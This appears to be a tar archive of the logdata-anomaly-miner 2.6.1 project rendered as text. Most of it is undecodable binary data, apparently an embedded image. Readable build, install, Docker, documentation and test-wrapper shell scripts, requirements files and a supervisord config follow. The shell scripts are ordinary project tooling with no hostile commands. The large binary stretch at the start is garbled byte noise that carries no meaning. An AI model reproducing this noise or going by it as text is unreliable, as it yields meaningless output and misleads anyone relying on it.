PƵK[χxb@mDPMz8Xe%,=,ܾj~wZ>!ҥu{Ic129`<~_L}ZU)`)Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@}kP:OEy޼k1|W6'-mvYAarr;kߌߴG5ZXjW-Yc HIuQw=krQ|?Wl]Y$j﫲Wny-wRO>#R]o 2Ox6 *nT@.PHw_wÿvu#G]]a sҕˣf>$I[oٞ.ӼC a`ԡfe_m'ԡP?5x_f&>..4_ڴS=d>`1ֿmK5,&gOPRR$a`jYVs\Ư z_ -Wĺ.n2k9##kꏄ| ំ-kiXMσ m^-Y'b(՝Ywi%vC35\N9',85Ïxc{>ieKall>⏄t{s5ݺ|ص<,p:U^rWG~OZ2UVrnﶟבKz|YMy;d0Z'@v6LuZ./-zޗ@|6n4N}mn7 PY~Nxo77](cbhݎv_i*T%]Tgk^|9OZ腯{;ɴ.1\A"YNAB+~о>zuִip[Kn,$H*M8*ŧ+14S{wV76_#Z>JϪ#WF7z% N2I6 09 }Eywu/4=_sy)A*2g@ﹽ ^\4iOIF3 Lk>>8o/w>IPVyi%=Y׹|<[cA }*'5_ |Ie (R}Oe;.uq+4nPI>U2z8)Vb'}T[3{|q{ BnF"4X\]XοM.k 2x^9'NŮ}>][3#qO"{[k>H|L,mPO![V%8^F8R[};S>#󊼳O|.ѣYvzaʓji~w~i8Fb:~Lgxm$_Xi5"-FX[di#9VhiJ7i7FtLM:sFvC38_'X/O[ې!&8;ArIcƦ|Yx<:Xu=E~zQEQEQEQEQEQEQEQEQEQEQEQEv ;>ެ(Xk,ȌAuoh~}5 G?~&kWp'_FuM(kS~6)?G埨J e ^ ѵwhŠ((((((((((((t|Bmn">i-eWxia3i"%'k8<#7F}e&st702rz_߶/ K~|6 OIu9|],:[Lu\)~ω(vsM{3RpDKylH_\tq%uw*zoS_ ~)!:I*>SJQO=C0#OAnx<[md\0Ǚ ).}wF=xh_(_ŸO&ĢZv= Y#>ZƘ"ǀaxX~ i4TX[%~A9qȭRU*[arVJOؿ*ן64I;MViOTS?Өk _ߵς).me%"M}@XW韀mO7/<=GT.ҫ"磩=BA?woc>YiZy d{ -gi+HR%fhN:R>gs2 R 
&sa/'JuPK|-KkSnm(9ff4’rzc$|:o5}ZI Y,}B'3֦ԩOꒃZah*'2?1_u_ş ~:u3n*N1 dq_ߴ߂;xoƾ#N[HC*1F+U*N-4ox*n-4yQ^Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@zW|U6qq0F!?R~"־X|>ls 0żϻTTG6&&~x{M43km'JТ¾CeȾ+xZoi1*kɐ:6$ބ+v55dFVPH"IIYz0cZzeދ\X[kyn9aaPj~~ŷ7[}I"@XJz'^m3X#H8aٔ`}GT#7]_dEQ@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@~<"?@ A|N5EkJwfoG5w;>!WCɂq\-VMCQEQ@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@jc:5M#Jkۗڈ:Vc=[OZz^dw FKn=OŚwM:k_]kS(v& I@:9SikQWo8|%GUMbX GbM}Eꤒ?VuTw՟1~ >'!rQ$IC~~+ >h+ .0hGz<Z*[kb Z?ΧÚ ;=.vFՏRܒIׂ~?ǯGԵ|R!\p;$=++2pjQFN-In5^*hZjr卿Bu#ɯۯ⭬(qv`9#% <N?%S][zΑX˧ #_]G>>"5dEuQ@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@M[[*~L?"@|1>|J'Y"jl*HA⣆5'R9)aINQEuQ@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@WE/įAOyy/,z$K]Tz$IwQWd >TeSc {]OF\':RS]Q ?Mqs1Դ=Q%|ׯ-w؍OúK}W5w_b5yA\\^)Q\ŔApAI_Trh'VoPm@%k/[Z~Q_ M MU}\)ϗ? (e_&e_&S/~Q_ M MU}p>_0s>??>?>O|aE~(|6 4(|6 4}UŸŠPm@%hPm@%h? 1K 1KW?  +?CcCc꯸W2o/G2o/G_p\)ϗ? (e_&e_&S/~Q_ M MU}p>_0s>??>?>O|aE~(|6 4(|6 4}UŸŠPm@%hPm@%h? 1K 1KW?  +?CcCc꯸W2o/G2o/G_p\)ϗ? (e_&e_&S/~Q_ M MU}p>_0s>??>?>O|aE~(|6 4(|6 4}UŸŠPm@%hPm@%h? 1K 1KW?  +?CcCc꯸W2o/G2o/G_p\)ϗ? (e_&e_&S/~Q_ M MU}p>_0s>??>?>O|aE~(|6 4(|6 4}UŸŠPm@%hPm@%h? 1K 1KW?  URAf<:Pm@%kGL::"F_>K[J~&xw?xW- 4'8 Zc&ʡAVP;$ۜiwZ?F~fo,FR*:>x;V,pDٚ ? ~߳)ǰt,Ot|G_rq|'E} j?<>wGWc?F}O(<>wG3 Q_u8x+|?ZgϝQ?>pW ;֣+3|)E} j?<>wGW`Tg?R_q8x+|?Z/ _3pWY]Q_wJ+gϝQ j>?'”W ;֣_q}evF}O(<>wG3 Q_u8x+|?ZgϝQ?>pW ;֣+3|)E} j?<>wGW`Tg?R_q8x+|?Z/ _3pWY]Q_wJ+gϝQ j>?'”W ;֣_q}evF}O(<>wG3 Q_u8x+|?ZgϝQ?>pW ;֣+3|)E} j?<>wGW`Tg?R_q8x+|?Z/ _3pWY]Q_wJ+gϝQ j>?'”W ;֣_q}evF}O(<>wG3 Q_u8x+|?ZgϝQ?>pW ;֣+3|)E} j?<>wGW`Tg?R_q8x+|?Z/ _3pWY]Q_wJ+gϝQ j>?'”8'W_ ;֫?dcM."./{-PYr`/!+R?2A-p1W7to4.?VZ[h{>a7w9=eðm'Ê騢ϪJ (WoI௏62%VZ4!F=р%2y#I*)AEٕ8~ |gvGew8ʶ i郸NwN{P~kYCyeqݤ)p{85b4'\+o][Mԃ=q =(!=sϥmy_#6>K;}B+Y㹷CG4.WůFMRw-/푥tcG%TX63q/kI̚Vڬ[ 1Skjokr8+i?Ѧ?G+o 7ͥؖڊ ǘݷ>lo/ jhk[Uu?ixW/Rկ.tYd !">ՙWzgNk>~>gɏ >V\կu2]]3'5x'_ =2o޼_iV %!n_ |=ivZmƣ{&v[D*N'T87+?jk>8j$|Mjm\E RK"7ꪬI&hzh;Ixve`bSx";:k[$r2xe<c@׭S7X _[`qq^yR 7TU3:˭g>>gɓ,>ouҨ}??1_| wNDw?j'͏{ OoWu~VIiqh::V ƾ(O-j+ xr#? 
OO>&Rl'3K?qVE׍xY%wާ'%Tc00C@.s6:m.'Kxՙ觉4o 4@=a@XdSKAY} ,sc_O*D~fW_o%~ -JԯҿJ`[/2Oy%CW?!ӿnme/.r@sEW% ~]'\_~-sA 6E4I=]?ŭ>S-@rі6e? Sj$:OKPe~|'$,i'$|_ 7_!(~ +_03뿳 $iڤ\4PSb-"n1޼w5_M2J $nG^=Ͼ۽OTu8/Zݡ%Pѱssqh?ᵼ@<zFֳg?k _^s RVUw,=")?|A?|A_Df,~w 7K$2(#q) _%}Qq2ey.|;c,3|mE?:J?d-1 l8eZExs +)_}@Q@|pCZBczMyWu?6)6<9x|7rFzV5x1aYx,0ؐWS_DG'I^@, mcƲC'HHnqW >d_@ZDAX<+_3 [OWR(~,+oCƿ}7?:$˂yzg{Z+D=|s$jӿEƫéY'oqE"VQ]]Eck5#2H碨'Ϳ\).YxApF}G_^?< MFdMHo۷~+hQǔ7-gh3N=O__ᯋ fItQap(>+|Huk'yLV!}̣ WԟW?=_4|⿊z. ifX/1S>`:o ??uh?Ac:[|Y5;157! 8[aBOڽ~Ο=VH-d#O W w %F?Z|Oai 7|pCZoH}uKOrGX߲7{g>|`_:;ǥFe2 F1 o}@IUZq7_D=Dkɘ~5⿱񗈓'iRGbD׷ԟB|MnUxE#1ho'$6f è0k>xk0Ȗbβ$3(rE}F=?$c,-CYQ |4xGÞ9&[Zc+ArJ2~ x-B}#R/X`ކe,o ??uh/]?7$']J0y  Ɋg]dr3QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEW_O*}mXF;o^d?]kuZ{I}w3sŎ7D=ɠ.| /QxT;9HrH*sF]h7VIn<9etpJh?ko/+M}  [|+_uKvZkZEG]2 ^݅|+x_V69[M]A{s}?R 7TU~ е-F-C\[ItInbYXv"_{U~xI>]]H8=Pn{Wn#KsӃ׼Pʿ׃]0N7i,N :9>[+k)2Bk| mC]Aϖ0>D@g?Ue7lqyv0} Ѿ$:OKV݅]bkx^Q)^i@/o(SQ`ҿJ`[/žhks/0^a٩KK+xV9!B'P?G?? \臯~*|~/ç&- `d0e* wXVÿ٣Ÿ mumc2&Sqlë΀>rjG_kW.5Xͳ=!ebTQ^@Q@|pCZ^YP#{Q2A F䏏Oƹ_4>MHkYRNٛ$a (Oۋ@اI^aDhl,mumF'Q@j᎓4S[KpN+rU/jş%~2-z櫩I,,.hJ`>yя?Je`[w_졚4-.QC+)=A޾~~&hk #4T` FriR<#p_!PTd8T `is^$5I<$%dR&xs%,/cY֯x-Űbw1ހ8/Ʒ&]չfHpI9J΋"2:V*FASFѬ|=imvV6# ORI&>'02@\ .цsܯ#Ծm.@ cn63߭zoxG}3]xÕ>Z4}+ղC'o΀=CRp4xl W _ov~ty㰞9[2rQ F3<߰S)uYmV#ؗ|~UKკm<.ƿ2b;z(?쁚+jokrg_?^xW[u,\F".[qX @_!~?1_&־;3,'.5 i7*davs7{g>xbBLi ;p;3I Ҭx6><4ezdkv H#gK%[SO|9Ut{FuK)?*؋G_=b9e/ xSi ,k uQڹ_;GngBTpu}. oJӮo*Qԫ~玡c|f;.̂C}Ԑ~u3\x{^Z܈0·lГԣF{#|!R ĺ|RcB#ip6}híoCvdEg01^]~útw. 'K%,W=:6⫻ȁ`$}K>?*vNUL 2>NUL if errorlevel 9009 ( echo. echo.The 'sphinx-build' command was not found. Make sure you have Sphinx echo.installed, then set the SPHINXBUILD environment variable to point echo.to the full path of the 'sphinx-build' executable. Alternatively you echo.may add the Sphinx directory to PATH. echo. 
echo.If you don't have Sphinx installed, grab it from echo.http://sphinx-doc.org/ exit /b 1 ) %SPHINXBUILD% -M %1 %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% %O% goto end :help %SPHINXBUILD% -M help %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% %O% :end popd logdata-anomaly-miner-2.6.1/docs/requirements.txt000066400000000000000000000000631437606560100221240ustar00rootroot00000000000000sphinx==3.5.1 sphinx_rtd_theme==0.5.1 recommonmark logdata-anomaly-miner-2.6.1/docs/setup.sh000077500000000000000000000006151437606560100203420ustar00rootroot00000000000000#!/bin/bash case "$1" in "install") ln -s ../README.md ln -s ../SECURITY.md ln -s ../LICENSE LICENSE.md git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git ../Wiki ;; "uninstall") unlink README.md unlink SECURITY.md unlink LICENSE.md test -d ../Wiki && rm -rf ../Wiki ;; *) echo "usage: $0 " exit 1 ;; esac logdata-anomaly-miner-2.6.1/requirements.txt000066400000000000000000000003141437606560100211730ustar00rootroot00000000000000scipy==1.5.4 pylibacl==0.5.4 kafka_python==2.0.2 pytz==2020.4 urllib3==1.26.5 numpy==1.22.0 Cerberus==1.3.2 psutil==5.7.3 kafka==1.3.5 pyzmq==20.0.0 python_dateutil==2.8.1 PyYAML==5.4 statsmodels==0.12.2 logdata-anomaly-miner-2.6.1/scripts/000077500000000000000000000000001437606560100174005ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/scripts/addbuildid.sh000077500000000000000000000012651437606560100220300ustar00rootroot00000000000000#!/bin/sh METAPATH="source/root/usr/lib/logdata-anomaly-miner/metadata.py" DOCSCONF="docs/conf.py" # fallback if git is not installed if [ ! `command -v git` ] then echo "Git is not installed. Won't set the BUILD_ID" exit 1 fi BUILD_ID=`git describe --tags --long 2> /dev/null` # fallback if this is not a git installation if [ $? -ne 0 ] then echo "This seems not to be a git installation." 
exit 0 fi BUILD_ID=`echo $BUILD_ID | sed 's/^[Vv]//'` echo "BUILD_ID: $BUILD_ID" if [ -e $METAPATH ] then sed -i "s/__version__\s*=\s*\".*\"/__version__ = \"$BUILD_ID\"/g" $METAPATH fi if [ -e $DOCSCONF ] then sed -i "s/release\s*=\s*'.*'/release = '$BUILD_ID'/g" $DOCSCONF fi exit 0 logdata-anomaly-miner-2.6.1/scripts/aminer_install.sh000077500000000000000000000037561437606560100227530ustar00rootroot00000000000000#!/bin/bash # if set to 1 this installer will delete the # source directory after installation DELDIR=1 BRANCH="main" URL="https://github.com/ait-aecid/logdata-anomaly-miner.git" AMINERDST=`mktemp -d` AMINERSRC=0 DISON=0 help() { echo "Usage: $0 [-h] [-b BRANCH] [-u GITURL] [-s LOCAL_GITREPO_PATH] [-d DIRECTORY]" 1>&2 } while getopts "hb:u:s:d:" options; do case "${options}" in b) BRANCH=${OPTARG} ;; h) help exit 1 ;; u) URL=${OPTARG} ;; s) AMINERSRC=${OPTARG} DELDIR=0 if [ ! -d $AMINERSRC ] then echo "Local Git-Repository $AMINERSRC does not exist." exit 1 fi ;; d) DISON=1 AMINERDST=${OPTARG} if [ -d $AMINERDST ] then echo "This directory($AMINERDST) already exists. Please remove it first" exit 1 fi DELDIR=0 ;; :) echo "$0: Must supply an argument to -$OPTARG." >&2 exit 1 ;; esac done if [ -e /etc/debian_version ] then SUDO=`which sudo` if [ $? 
-ne 0 ] then echo "Please install and configure sudo first" exit 1 fi sudo /usr/bin/apt-get update sudo DEBIAN_FRONTEND=nointeractive /usr/bin/apt-get install -y -q ansible git else echo "Currently only debian based distributions are supported" exit 1 fi if [ $AMINERSRC -eq 0 ] then git clone -b $BRANCH $URL $AMINERDST else if [ $DISON -eq 1 ] then cp -rap $AMINERSRC $AMINERDST else AMINERDST=$AMINERSRC fi fi cd $AMINERDST test -d roles || mkdir roles git clone -b $BRANCH https://github.com/ait-aecid/aminer-ansible roles/aminer cat > playbook.yml << EOF - hosts: localhost vars: aminer_gitrepo: False # We assume that we cloned the aminer to /home/developer/aminer aminer_repopath: "${AMINERDST}" roles: - aminer EOF # Use this command to deploy the aminer-files # You can add your changes in the aminer-directory # and repeatedly execute this command to deploy # your changes sudo ansible-playbook playbook.yml if [ $DELDIR -eq 1 ] then test -d $AMINERDST && rm -rf $AMINERDST fi exit 0 logdata-anomaly-miner-2.6.1/scripts/aminerwrapper.sh000077500000000000000000000007351437606560100226200ustar00rootroot00000000000000#!/bin/bash AMINERDIR=/usr/lib/logdata-anomaly-miner case "$1" in aminer) $AMINERDIR/aminer.py ${*:2} ;; aminerremotecontrol) $AMINERDIR/aminerremotecontrol.py ${*:2} ;; aminer-persistence) $AMINERDIR/aminer-persistence.py ${*:2} ;; supervisor) /usr/bin/supervisord ;; mkdocs) cd /docs make html ;; *) echo "Usage: [ aminer | aminerremotecontrol | aminer-persistence | supervisor | mkdocs ] " exit 1 ;; esac exit 0 logdata-anomaly-miner-2.6.1/scripts/build_docker.sh000077500000000000000000000004531437606560100223670ustar00rootroot00000000000000#!/bin/bash CONTAINER="docker" test $CONTAINER_PROG && CONTAINER=$CONTAINER_PROG scripts/addbuildid.sh $CONTAINER build -t aecid/logdata-anomaly-miner:latest -t aecid/logdata-anomaly-miner:$(grep '__version__ =' source/root/usr/lib/logdata-anomaly-miner/metadata.py | awk -F '"' '{print $2}') . 
logdata-anomaly-miner-2.6.1/scripts/create_aminerremotecontrol_wiki.sh000077500000000000000000000124071437606560100264010ustar00rootroot00000000000000cd /usr/share/man/man1/ sudo xsltproc --output /usr/share/man/man1/aminerremotecontrol.1 -''-nonet -''-param man.charmap.use.subset "0" -''-param make.year.ranges "1" -''-param make.single.year.ranges "1" /usr/share/xml/docbook/stylesheet/docbook-xsl/manpages/docbook.xsl /home/user/Documents/Git_projects/logdata-anomaly-miner/debian/aminerremotecontrol.1.xml && sudo gzip /usr/share/man/man1/aminerremotecontrol.1 sudo gunzip /usr/share/man/man1/aminerremotecontrol.1.gz sudo cp /usr/share/man/man1/aminerremotecontrol.1 /tmp sudo chown user:user /tmp/aminerremotecontrol.1 sudo apt install pandoc pandoc --from man --to gfm /tmp/aminerremotecontrol.1 -o /tmp/aminerremotecontrol.md # man-to-github-flawored-markdown # quotes are not successfully recreated from the parser.. sed -i $'s/,property\\\_name/,\'property\\\_name\'/g' /tmp/aminerremotecontrol.md sed -i $'s/,attribute/,\'attribute\'/g' /tmp/aminerremotecontrol.md sed -i $'s/NewMatchPath,/\'NewMatchPath\',/g' /tmp/aminerremotecontrol.md sed -i $'s/NewMatchPathDet)/\'NewMatchPathDet\')/g' /tmp/aminerremotecontrol.md sed -i $'s/auto\\\_include\\\_flag,/\'auto\\\_include\\\_flag\',/g' /tmp/aminerremotecontrol.md sed -i $'s/auto\\\_include\\\_flag)/\'auto\\\_include\\\_flag\')/g' /tmp/aminerremotecontrol.md sed -i $'s/,old\\\_component\\\_name,/,\'old\\\_component\\\_name\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,new\\\_component\\\_name/,\'new\\\_component\\\_name\'/g' /tmp/aminerremotecontrol.md sed -i $'s/,history\\\_component\\\_name/,\'history\\\_component\\\_name\'/g' /tmp/aminerremotecontrol.md sed -i $'s/NewMatchPathDetector/\'NewMatchPathDetector\'/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\'NewMatchPathDetector\'\*/\*NewMatchPathDetector\*/g' /tmp/aminerremotecontrol.md sed -i $'s/,component\\\_name/,\'component\\\_name\'/g' /tmp/aminerremotecontrol.md sed 
-i $'s/AtomFilter/,\'AtomFilter\'/g' /tmp/aminerremotecontrol.md sed -i $'s/LogResourceList/\'LogResourceList\'/g' /tmp/aminerremotecontrol.md sed -i $'s/,atom\\\_handler,/,\'atom\\\_handler\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,destination\\\_file/,\'destination\\\_file\'/g' /tmp/aminerremotecontrol.md sed -i $'s,/tmp/config.py,\'/tmp/config.py\',g' /tmp/aminerremotecontrol.md sed -i $'s/,EnhancedNewMatchPathValueComboDetector,/,\'EnhancedNewMatchPathValueComboDetector\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,MissingMatchPathValueDetector,/,\'MissingMatchPathValueDetector\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,NewMatchPathValueComboDetector,/,\'NewMatchPathValueComboDetector\',/g' /tmp/aminerremotecontrol.md sed -i $'s,new/path,\'new/path\',g' /tmp/aminerremotecontrol.md sed -i $'s/,VolatileLogarithmicBackoffEventHistory,/,\'VolatileLogarithmicBackoffEventHistory\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.TargetAddress,/,\'MailAlerting.TargetAddress\',/g' /tmp/aminerremotecontrol.md sed -i $'s/root@localhost/\'root@localhost\'/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.FromAddress,/,\'MailAlerting.FromAddress\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.SubjectPrefix,/,\'MailAlerting.SubjectPrefix\',/g' /tmp/aminerremotecontrol.md sed -i $'s/aminer Alerts:)/\'aminer Alerts:\')/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.EventCollectTime,/,\'MailAlerting.EventCollectTime\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.MinAlertGap,/,\'MailAlerting.MinAlertGap\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.MaxAlertGap,/,\'MailAlerting.MaxAlertGap\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.MaxEventsPerMessage,/,\'MailAlerting.MaxEventsPerMessage\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,LogPrefix,/,\'LogPrefix\',/g' /tmp/aminerremotecontrol.md sed -i $'s/Original log/\'Original log/g' /tmp/aminerremotecontrol.md sed -i $'s/line: /line: \'/g' 
/tmp/aminerremotecontrol.md sed -i $'s/This defaults to ./This defaults to \'\'./g' /tmp/aminerremotecontrol.md sed -i $'s/,Resources.MaxMemoryUsage,/,\'Resources.MaxMemoryUsage\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,Core.PersistencePeriod,/,\'Core.PersistencePeriod\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,Log.StatisticsLevel,/,\'Log.StatisticsLevel\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,Log.DebugLevel,/,\'Log.DebugLevel\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,Log.StatisticsPeriod,/,\'Log.StatisticsPeriod\',/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\*socket/\*\* \*socket/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\*command/\*\* \*command/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\*file/\*\* \*file/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\*data/\*\* \*data/g' /tmp/aminerremotecontrol.md sed -i $'s/command\*\*\*/command\* \*\*/g' /tmp/aminerremotecontrol.md sed -i $'s/file\*\*\*/file\* \*\*/g' /tmp/aminerremotecontrol.md sed -i $'s/^\*\*$//g' /tmp/aminerremotecontrol.md sed -i $'s/^\*\* \*\*\*/\*\*\*/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\* \*\*/\*\*\*/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\*/\*\*/g' /tmp/aminerremotecontrol.md sed -i ':a;N;$!ba;s/\*\*aminerremotecontrol\*\* \\\[\*\*\\\[--exec \*\* \*command\* \*\*\\] | \\\[--exec-file\n\*\* \*file\* \*\*\\]\*\*\\] \*\*\\\[OPTIONS\\]...\*\*/\*\*aminerremotecontrol\*\* \\\[\*\*\\\[--exec \*\* \*command\* \*\*\\] | \\\[--exec-file\*\* \*file\* \*\*\\]\*\*\\] \*\*\\\[OPTIONS\\]...\*\*/g' /tmp/aminerremotecontrol.md logdata-anomaly-miner-2.6.1/scripts/deploydocs.sh000077500000000000000000000012441437606560100221050ustar00rootroot00000000000000#!/usr/bin/bash BRANCH=$1 SOURCE=$2 DEST=$3 case $BRANCH in development) test -d $DEST/development && rm -rf $DEST/development cp -r $SOURCE $DEST/development ;; main) VERSION=$(grep '__version__ =' source/root/usr/lib/logdata-anomaly-miner/metadata.py | awk -F '"' '{print $2}') if [ $(echo $VERSION | grep -P 
"\d+\.\d+\.\d+") ] then test -d $DEST/$VERSION && rm -rf $DEST/$VERSION cp -r $SOURCE $DEST/$VERSION test -e $DEST/current && unlink $DEST/current ln -s $DEST/$VERSION $DEST/current else echo "Unable to identify the aminer-version!" exit 1 fi ;; *) echo "usage: $0 main|development" exit 1 ;; esac exit 0 logdata-anomaly-miner-2.6.1/scripts/distritest.sh000066400000000000000000000003241437606560100221310ustar00rootroot00000000000000#!/bin/bash sudo service rsyslog start sudo service apache2 start curl localhost curl -XPOST localhost curl -I localhost sudo timeout --preserve-status 20s aminer --config /home/aminer/gettingStarted-config.yml logdata-anomaly-miner-2.6.1/scripts/prep-docker-compose.sh000077500000000000000000000015501437606560100236160ustar00rootroot00000000000000#!/bin/bash test -d aminercfg || mkdir aminercfg test -d persistency || mkdir persistency test -d persistency/log || mkdir persistency/log test -d logs || mkdir logs test -d akafka || mkdir akafka test -e aminercfg/config.yml || cp -r source/root/etc/aminer/template_config.yml aminercfg/config.yml test -d aminercfg/conf-enabled || mkdir aminercfg/conf-enabled test -e aminercfg/conf-enabled/ApacheAccessModel.py || cp source/root/etc/aminer/conf-available/generic/ApacheAccessModel.py aminercfg/conf-enabled/ApacheAccessModel.py sed -i "s+# - 'unix+ - 'unix+g" aminercfg/config.yml sed -i "s+ - 'file:///var/log/apache2/access.log'+# - 'file:///logs/access.log'+g" aminercfg/config.yml sed -i "s+# RemoteControlSocket: '/var/lib/aminer/log/remcontrol.sock'+RemoteControlSocket: '/var/lib/aminer/log/remcontrol.sock'+g" aminercfg/config.yml logdata-anomaly-miner-2.6.1/scripts/supervisord.conf000066400000000000000000000003711437606560100226350ustar00rootroot00000000000000[supervisord] nodaemon=true pidfile=/var/lib/supervisor/supervisor.pid [unix_http_server] file=/var/lib/supervisor/supervisor.sock [include] files = /etc/supervisor/conf.d/*.conf [program:aminer] 
command=/usr/lib/logdata-anomaly-miner/aminer.py logdata-anomaly-miner-2.6.1/scripts/testingwrapper.sh000077500000000000000000000066431437606560100230260ustar00rootroot00000000000000#!/bin/bash TESTDIR=/home/aminer/aecid-testsuite if [ $# -gt 0 ] then sudo service rsyslog start sudo service postfix start fi case "$1" in runSuspendModeTest) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runUnittests) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runAminerDemo) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runAminerJsonInputDemo) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runAminerIntegrationTest) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runCoverageTests) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runRemoteControlTest) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runGettingStarted) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runTryItOut) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runHowToCreateYourOwnSequenceDetector) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runHowToCreateYourOwnFrequencyDetector) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runHowToMissingMatchPathValueDetector) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runHowToEntropyDetector) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runJsonDemo) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runAminerEncodingDemo) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runOfflineMode) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runMypy) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runConfAvailableTest) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runReleaseStringCheck) cd $TESTDIR ./${1}.sh ${*:2} exit $? 
;; ALL) cd $TESTDIR ./runMypy.sh ./runReleaseStringCheck.sh ./runSuspendModeTest.sh ./runUnittests.sh ./runRemoteControlTest.sh ./runConfAvailableTest.sh ./runAminerDemo.sh demo/aminer/demo-config.py ./runAminerDemo.sh demo/aminer/jsonConverterHandler-demo-config.py ./runAminerDemo.sh demo/aminer/template_config.py ./runAminerDemo.sh demo/aminer/template_config.yml ./runAminerDemo.sh demo/aminer/demo-config.yml ./runAminerEncodingDemo.sh demo/aminer/demo-config.py ./runAminerEncodingDemo.sh demo/aminer/demo-config.yml ./runAminerJsonInputDemo.sh ./runJsonDemo.sh demo/aminerJsonInputDemo/json-aminer-demo.yml ./runJsonDemo.sh demo/aminerJsonInputDemo/json-elastic-demo.yml ./runJsonDemo.sh demo/aminerJsonInputDemo/json-eve-demo.yml ./runJsonDemo.sh demo/aminerJsonInputDemo/json-journal-demo.yml ./runJsonDemo.sh demo/aminerJsonInputDemo/json-wazuh-demo.yml ./runAminerIntegrationTest.sh aminerIntegrationTest.sh config.py ./runAminerIntegrationTest.sh aminerIntegrationTest2.sh config21.py config22.py ./runOfflineMode.sh ./runGettingStarted.sh ./runTryItOut.sh ./runHowToCreateYourOwnSequenceDetector.sh ./runHowToCreateYourOwnFrequencyDetector.sh ./runHowToMissingMatchPathValueDetector.sh ./runHowToEntropyDetector.sh ./runCoverageTests.sh exit $? 
;; SHELL) bash exit 0 ;; *) echo "Usage: [ ALL | SHELL | runSuspendModeTest | runUnittests | runAminerDemo | runJsonDemo | runAminerJsonInputDemo " echo " runAminerIntegrationTest | runOfflineMode | runCoverageTests | runRemoteControlTest | runTryItOut " echo " runGettingStarted | runHowToCreateYourOwnSequenceDetector | runHowToCreateYourOwnFrequencyDetector" echo " runHowToMissingMatchPathValueDetector | runHowToEntropyDetector | runAminerEncodingDemo | runMypy" echo " runConfAvailableTest | runReleaseStringCheck ] " exit 1 ;; esac exit 0 logdata-anomaly-miner-2.6.1/source/000077500000000000000000000000001437606560100172115ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/000077500000000000000000000000001437606560100201745ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/etc/000077500000000000000000000000001437606560100207475ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/etc/aminer/000077500000000000000000000000001437606560100222225ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/000077500000000000000000000000001437606560100250655ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/ait-lds/000077500000000000000000000000001437606560100264225ustar00rootroot00000000000000ApacheAccessParsingModel.py000066400000000000000000000064311437606560100335310ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/ait-lds"""This module defines a generated parser model.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from 
